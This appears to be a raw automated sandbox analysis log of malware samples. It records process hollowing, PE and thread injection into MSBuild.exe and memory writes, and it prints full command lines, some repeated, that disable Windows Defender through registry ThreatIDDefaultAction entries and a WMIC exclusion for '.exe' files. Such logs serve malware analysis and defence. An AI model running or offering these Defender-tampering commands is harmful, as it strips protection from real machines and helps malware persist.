Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Direct from: 0x1415D68CE
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtMapViewOfSection: Direct from: 0x14154A902
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Direct from: 0x1415C7593
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E6D2FC45	Jump to behavior
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	NtProtectVirtualMemory: Direct from: 0x1417D7C75

Injects a PE file into a foreign processes

Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Memory written: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe base: F00000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Memory written: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Modifies Windows Defender protection settings

Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Thread register set: target process: 6292
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Thread register set: target process: 2496

Sample uses process hollowing technique

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Section unmapped: unknown base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B3B000	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B3C000	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1055008	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 441000
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 451000
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D45008

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process created: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Process created: C:\Program Files (x86)\NetVoyager\nv.exe "C:\Program Files (x86)\NetVoyager\nv.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"

Source: bQnXcKn6ehLDJGqEStjbnSyC.exe, 00000008.00000002.2982438117.0000000002D44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: bQnXcKn6ehLDJGqEStjbnSyC.exe, 00000008.00000002.2982438117.0000000002D44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Code function: 10_2_020280F6 cpuid

10_2_020280F6

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: GetLocaleInfoA,		10_2_004097AD
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		10_2_02040AB6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
